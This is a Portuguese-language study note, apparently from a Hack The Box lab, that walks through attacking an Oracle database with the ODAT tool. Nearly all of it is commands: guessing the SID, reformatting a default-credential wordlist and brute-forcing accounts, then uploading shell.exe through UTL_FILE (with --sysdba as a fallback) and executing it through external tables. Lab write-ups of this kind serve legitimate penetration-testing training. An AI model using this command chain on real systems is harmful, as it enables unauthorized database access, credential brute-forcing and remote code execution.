Skip to content

Oracle

https://github.com/quentinhardy/odat/blob/master-python3/README.md

Instalar o standalone

https://github.com/quentinhardy/odat/releases/

python odat.py -h

SID guesser

Obtendo SID:

python odat.py sidguesser -s 10.129.125.94 -p 1521

Wordlist Oracle

/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

Preparando para o brute force com o "odat"

sed -i 's/ /\//g' /home/kali/ownCloud/owncloud/Area_de_trabalho/estudos/hack_the_box/silo/oracle_default_userpass.txt

O formato do arquivo deve ser:

login/passsword teste/password123 . . .

Bruteforce

Podemos realizar testes de força bruta:

python odat.py passwordguesser -s 10.129.125.94 -p 1521 --accounts-file /home/kali/ownCloud/owncloud/Area_de_trabalho/estudos/hack_the_box/silo/oracle_default_userpass.txt

Opção com usuário em um arquivo e password em outro

odat passwordguesser -s 10.10.10.82 -d 'XE' --accounts-files login_certo.txt password_certo.txt

File Upload

Uma vez com o SID + Conta válida no banco, podemos conduzir testes mais agressivos:

python odat.py utlfile -s 10.129.95.188 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /home/kali/ownCloud/owncloud/Area_de_trabalho/estudos/hack_the_box/silo/shell.exe

Caso o usuário não possua permissão, podemos utilizar a flag --sysdba

python odat.py utlfile -s 10.129.95.188 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /home/kali/ownCloud/owncloud/Area_de_trabalho/estudos/hack_the_box/silo/shell.exe --sysdba

File execution

Para executar o payload que subimos na máquina, podemos considerar o seguinte comando:

python3 odat.py externaltable -s 10.129.95.188 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba